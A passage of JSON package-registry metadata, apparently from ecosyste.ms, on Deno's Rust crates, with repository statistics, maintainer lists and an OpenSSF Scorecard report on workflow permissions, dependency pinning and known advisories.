ependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T08:18:33.978Z","dependent_packages_count":4,"downloads":427402,"downloads_period":"total","dependent_repos_count":1,"rankings":{"downloads":7.6274891089705905,"dependent_repos_count":16.666163825614724,"dependent_packages_count":7.416206594865297,"stargazers_count":0.0022611133722244834,"forks_count":0.05803524322042841,"docker_downloads_count":6.750482392667631,"average":6.42010637978515},"purl":"pkg:cargo/deno_napi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_napi","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_napi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_napi/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_napi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_napi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_napi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_napi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_napi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_napi/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-08T07:01:34.073Z","updated_at":"2022-11-08T07:01:34.073Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:28.609Z","updated_at":"2023-07-18T22:41:28.609Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11576716,"name":"deno_features","ecosystem":"cargo","description":"Provides definitions of Deno unstable features.","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":55,"first_release_published_at":"2025-04-23T08:26:12.865Z","latest_release_published_at":"2026-08-06T11:45:20.749Z","latest_release_number":"0.54.0","last_synced_at":"2026-08-29T21:57:16.009Z","created_at":"2025-04-23T08:31:44.935Z","updated_at":"2026-08-29T21:57:16.009Z","registry_url":"https://crates.io/crates/deno_features/","install_command":"cargo install deno_features","documentation_url":"https://docs.rs/deno_features/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: 